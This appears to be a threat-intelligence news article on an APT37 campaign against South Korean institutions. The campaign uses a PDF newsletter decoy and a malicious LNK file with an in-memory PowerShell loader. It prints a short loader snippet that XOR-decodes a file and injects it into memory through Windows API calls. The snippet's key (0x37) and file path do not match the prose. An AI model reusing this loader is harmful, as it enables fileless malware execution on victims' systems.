Attackers have begun leveraging a seemingly innocuous PDF newsletter alongside a malicious Windows shortcut (LNK) file to infiltrate enterprise environments.
The attack surfaced in late August 2025, targeting South Korean academic and government institutions under the guise of a legitimate “국가정보연구회 소식지 (52호)” PDF newsletter.
Victims receive an archive containing both the PDF decoy and a companion .lnk file masquerading as the newsletter. When the shortcut is executed, a multi‐stage PowerShell loader embedded within the LNK unpacks and deploys additional payloads entirely in memory, evading disk‐based detection.
Early analysis revealed that the LNK file hides three binary payloads at precise offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a final executable at 0x0015AED2.
Upon execution, a PowerShell one-liner within the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, and then kicks off a batch script (aio03.bat) to decode and run the loader.
Seqrite analysts noted that this fileless approach allows the attackers to bypass signature‐based defenses by never writing the ultimate payload to disk.
Subsequent investigation by Seqrite researchers identified that the final payload, once decrypted with a single‐byte XOR key (0x35), is injected directly into memory via Windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.
This reflective DLL injection technique ensures that the malicious code executes in a stealthy manner, leaving minimal forensic artifacts.
Detailed reverse engineering of the loader binary uncovered environment checks for VMware tools and sandbox evasion routines that prevent execution in analysis environments, confirming the high sophistication of the threat actor known as APT37.
.webp "Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems 3")
$exePath = "$env:temptony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)Infection Mechanism
The infection begins when the user double‐clicks the deceptive .lnk file, which triggers PowerShell under the hood.
.webp "Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems 4")
The script parses its own binary content using Get-Item and ReadAllBytes, extracting the decoy PDF for display while staging the real payloads.
Once staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script stored in aio02.dat, which in turn orchestrates the XOR decryption and reflective injection of aio01.dat.
By leveraging in-memory execution, the attackers sidestep conventional endpoint protection platforms that rely on disk‐based scanning.
This layered infection chain, combining decoy documents, embedded payloads, and fileless techniques, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
